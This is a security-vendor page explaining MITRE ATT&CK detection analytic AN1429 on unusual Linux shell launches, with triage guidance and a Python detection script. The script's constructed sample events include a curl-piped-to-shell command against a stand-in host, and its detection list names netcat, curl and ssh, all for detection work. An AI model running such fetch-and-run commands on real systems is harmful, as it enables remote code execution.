MITRE ATT&CK® Analytic

AN1429: Analytic 1429

Detects use of shell interpreters (e.g., bash, sh, python, perl) initiated by users or processes not normally executing them, especially when chaining suspicious utilities like netcat, curl, or ssh.

Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

AN1429 is a Linux detection analytic focused on unusual launches of shell interpreters such as bash, sh, python, or perl, especially when paired with utilities like netcat, curl, or ssh. For leaders, the value is that unexpected shell activity is often a decision point in investigations: it can indicate automation, administration, or potentially unauthorized command execution. The business question is whether the organization can distinguish normal Linux operations from abnormal shell-driven behavior quickly enough to support incident response and continuity decisions.

Executive priority

Prioritize this analytic where Linux systems support critical applications, cloud workloads, administrative tooling, or regulated services. Executives should ask whether SOC teams have enough Linux process telemetry to prove who or what started a shell, whether that behavior is normal for the host or user, and whether suspicious chaining to network utilities is reviewed. This is also useful audit evidence for monitoring coverage, but the supplied ATT&CK object does not define a specific tactic, technique, or mitigation outcome.

Technical view

Validate detection logic for Linux process execution where shell interpreters are initiated by users or parent processes that do not normally execute them. Focus triage on parent-child process relationships, command lines, initiating user context, host role, and chaining involving utilities named in the analytic description: netcat, curl, or ssh. Because no official detection logic is provided, teams should build environment-specific baselines for expected shell use by administrators, service accounts, automation, package management, and application runtime behavior before treating matches as high confidence.

Likely telemetry

  • Linux process creation events
  • Command-line arguments for shell interpreters and related utilities
  • Parent-child process lineage
  • User and service account context
  • Host identity, role, and workload context

Detection direction

  • Confirm telemetry captures Linux process starts with full command line, parent process, user, and host context.
  • Baseline normal shell interpreter usage by host role, user group, service account, scheduled task, and automation framework.
  • Tune for uncommon parent processes launching bash, sh, python, or perl, rather than alerting on all shell execution.
  • Increase priority when shell interpreter execution is chained with netcat, curl, or ssh, while accounting for legitimate administration and deployment workflows.
  • Review false positives from system maintenance, scripts, configuration management, developer activity, backup jobs, and application startup scripts.
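The baselining and prioritisation steps above, worked through as an added example (this is illustrative code, not detection logic from MITRE or Glexia): each constructed Linux process-creation event is compared against an assumed per-host-role baseline of parent processes that normally launch shell interpreters, and any non-baseline launch is scored higher when its command line chains netcat, curl, or ssh. The event field names, the baseline contents, and the sample events are all assumptions.

```python
import re
from typing import Optional

INTERPRETERS = {"bash", "sh", "dash", "python", "python3", "perl"}
CHAIN_UTILS = {"nc", "netcat", "ncat", "curl", "ssh"}
# Assumed baseline (not from the page): (host_role, user) -> parent processes
# that normally launch shell interpreters there. Derive yours from telemetry.
BASELINE = {
    ("webserver", "root"): {"cron", "systemd", "ansible"},
    ("devbox", "alice"): {"sshd", "tmux", "bash"},
}

def _base(path: str) -> str:
    return path.rsplit("/", 1)[-1]

def score_event(ev: dict) -> Optional[dict]:
    """Score one process-creation event; None means it matched the baseline."""
    image = _base(ev["image"])
    if image not in INTERPRETERS:
        return None
    parent = _base(ev["parent_image"])
    if parent in BASELINE.get((ev["host_role"], ev["user"]), set()):
        return None
    # Tokenize so "ssh" matches as a word but a substring like "curly" does not.
    tokens = set(re.findall(r"[A-Za-z0-9_.-]+", ev["cmdline"]))
    chained = sorted(tokens & CHAIN_UTILS)
    return {"host": ev["host"], "user": ev["user"], "parent": parent,
            "interpreter": image, "chained": chained,
            "priority": "high" if chained else "medium"}

def score_events(events: list) -> list:
    return [f for f in map(score_event, events) if f is not None]

# Constructed sample telemetry, not real logs.
SAMPLE = [
    {"host": "web01", "host_role": "webserver", "user": "root", "image": "/bin/bash",
     "parent_image": "/usr/sbin/cron", "cmdline": "bash /opt/backup.sh"},
    {"host": "web01", "host_role": "webserver", "user": "www-data", "image": "/bin/sh",
     "parent_image": "/usr/sbin/apache2", "cmdline": "sh -c 'curl -s http://example.invalid/s | sh'"},
    {"host": "dev02", "host_role": "devbox", "user": "alice", "image": "/usr/bin/python3",
     "parent_image": "/usr/bin/tmux", "cmdline": "python3 manage.py runserver"},
    {"host": "dev02", "host_role": "devbox", "user": "alice", "image": "/usr/bin/perl",
     "parent_image": "/usr/bin/vim", "cmdline": "perl -e 'print 1'"},
]

if __name__ == "__main__":
    for finding in score_events(SAMPLE):
        print(finding)
```

Only the web-server shell spawned by apache2 (chained with curl, so high) and the perl launch from an editor (medium) surface; the cron and tmux launches are absorbed by the baseline.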

Mitigation priorities

  • Ensure Linux endpoint or workload monitoring collects process execution, command line, user, and parent process metadata.
  • Define approved administrative and automation patterns for shell interpreter use on critical Linux systems.
  • Reduce unnecessary shell access for service accounts and users where operationally feasible.
  • Review and document legitimate use cases for network utilities such as netcat, curl, and ssh on monitored hosts.
  • Use alert triage procedures that require validation of user intent, parent process legitimacy, host role, and network activity before escalation.

Analyst notes and limits

This object is a detection analytic, not a full ATT&CK technique. The strongest defensible interpretation is behavioral: unusual Linux shell interpreter execution by unexpected users or processes, especially with suspicious utility chaining. The supplied object provides no relationship context, no tactic mapping, and no official detection query, so local baselining is essential.

The official detection field is not provided, tactics are not specified, and no relationships are supplied. This take cannot infer adversary attribution, active exploitation, impact, or guaranteed detection coverage. Applicability is limited to the supplied platform: Linux.

Official MITRE ATT&CK definition

Analytic 1429

Detects use of shell interpreters (e.g., bash, sh, python, perl) initiated by users or processes not normally executing them, especially when chaining suspicious utilities like netcat, curl, or ssh.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the Updates page under ATT&CK resources.

ATT&CK release: 19.1
Object version: 1.0
Created: (not provided)
Modified: (not provided)
Raw hash: b0ac28394f95b7ae...

Imported snapshots across ATT&CK releases (1)

  • Release 19.1, object version 1.0, status: current bundle, raw hash b0ac28394f95… (bundle import time and modified date not provided)
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. mitre-attack: AN1429

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.